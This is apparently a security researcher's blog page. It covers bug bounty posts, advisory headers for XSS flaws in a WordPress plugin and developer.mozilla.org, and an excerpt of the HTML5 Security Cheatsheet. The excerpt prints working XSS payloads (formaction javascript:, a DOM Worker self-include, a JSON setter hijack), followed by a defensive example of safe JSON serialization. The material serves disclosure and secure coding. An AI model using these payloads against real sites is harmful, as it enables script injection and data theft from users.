
MARKPLAATS.nl Bug Bounty Program #Bounty received

Today I received my bounty for a vulnerability, which I reported for the MARKPLAATS.nl Bug Bounty Program.
 
And here it is … my ‘ebay classifieds whitehat’ :-)
 
 
 
 
 
Really nice, isn’t it :-) ?
 
In my opinion the MARKPLAATS.nl bug bounty program is one of the good ones, fast feedback and a nice contact, too. 
 
By the way, the vulnerability is not fixed yet, so I will publish the advisory at a later time.
 

Yahoo Bug Bounty Program Vulnerability #2 Open Redirect

In Dec ’13 I reported an Open Redirect (and two other vulnerabilities, first in Nov ’13) to the Yahoo Bug Bounty Program. Sadly, I’ve got no response or feedback for any of these issues, so I wrote a new message to them (this time via email).
 
Last week they told me that Open redirects are no longer in scope of the bug bounty program :-/
 
So here is my advisory for this issue:
 
 

SSCHADV2014-001 - Wordpress Plugin WP-Members Version 2.8.9 - Stored and reflected Cross-site Scripting vulnerabilities

Advisory:
Wordpress Plugin WP-Members 2.8.9 – Multiple Cross-site Scripting vulnerabilities
Advisory ID:
SSCHADV2014-001
Author:
Stefan Schurtz
Affected Software:
Successfully tested on WP-Members Version 2.8.9
Vendor URL:
Vendor Status:
fixed
 
======================
Vulnerability Description
======================
 
The WordPress plugin "WP-Members 2.8.9" is prone to reflected and stored XSS vulnerabilities.
 

SSCHADV2013-010 - developer.mozilla.org DOM based Cross-site Scripting vulnerability

Advisory:
developer.mozilla.org - DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-010
Author:
Stefan Schurtz
Affected Software:
Successfully tested on developer.mozilla.org
Vendor URL:
Vendor Status:
fixed
 
 
==========================
Vulnerability Description
==========================
 
The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability.
 
 

HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form
 
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
 
Self-including DOM Worker XSS
 
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
 
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
 
Self-hijacking JSON literals
 
In case parts of a JSON literal are controlled by user input there’s a risk to allow auto-harvesting values from later object members.
 
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
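
The defensive side of the "Self-hijacking JSON literals" entry, as an added example that is not part of the original post or the cheat sheet: a literal built by string concatenation next to one serialized in a single step and escaped for use inside an inline script. All function names and sample values are hypothetical and constructed for illustration.

```javascript
// Added example; unsafeLiteral, safeLiteral, isPlainData, check and all
// sample values are hypothetical and constructed for illustration.

// Weak: user input is spliced into the literal as raw text, so a quote in the
// input ends the string and lets the input add members next to later values.
function unsafeLiteral(userValue, secret) {
  return '[{"a":"' + userValue + '","b":["' + secret + '"]}]';
}

// Hardened: serialize the whole structure in one step, then escape the
// characters that could close the <script> element or act as JS line breaks.
const ESCAPES = {
  '<': '\\u003c', '>': '\\u003e', '&': '\\u0026',
  '\u2028': '\\u2028', '\u2029': '\\u2029',
};
function safeLiteral(userValue, secret) {
  return JSON.stringify([{ a: userValue, b: [secret] }])
    .replace(/[<>&\u2028\u2029]/g, (c) => ESCAPES[c]);
}

// True only if the literal parses as JSON with exactly the members "a" and
// "b" and the input survived as plain data inside "a".
function isPlainData(literal, userValue, secret) {
  try {
    const [obj, ...rest] = JSON.parse(literal);
    return rest.length === 0 &&
      Object.keys(obj).join() === 'a,b' &&
      obj.a === userValue && obj.b[0] === secret;
  } catch (err) {
    return false; // the input broke the literal's syntax
  }
}

// Runs one builder on one input: is the result still plain data, and is it
// free of characters the HTML parser would act on inside <script>?
function check(build, input) {
  const literal = build(input, 's3cr3t');
  return { data: isPlainData(literal, input, 's3cr3t'),
           inline: !/[<>&]/.test(literal) };
}

// Constructed inputs: benign, extra-member injection, closing script tag.
for (const s of ['alice', 'x","c":"y', '</script>']) {
  console.log(JSON.stringify(s), 'concatenated:', check(unsafeLiteral, s),
    'serialized:', check(safeLiteral, s));
}
```
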
 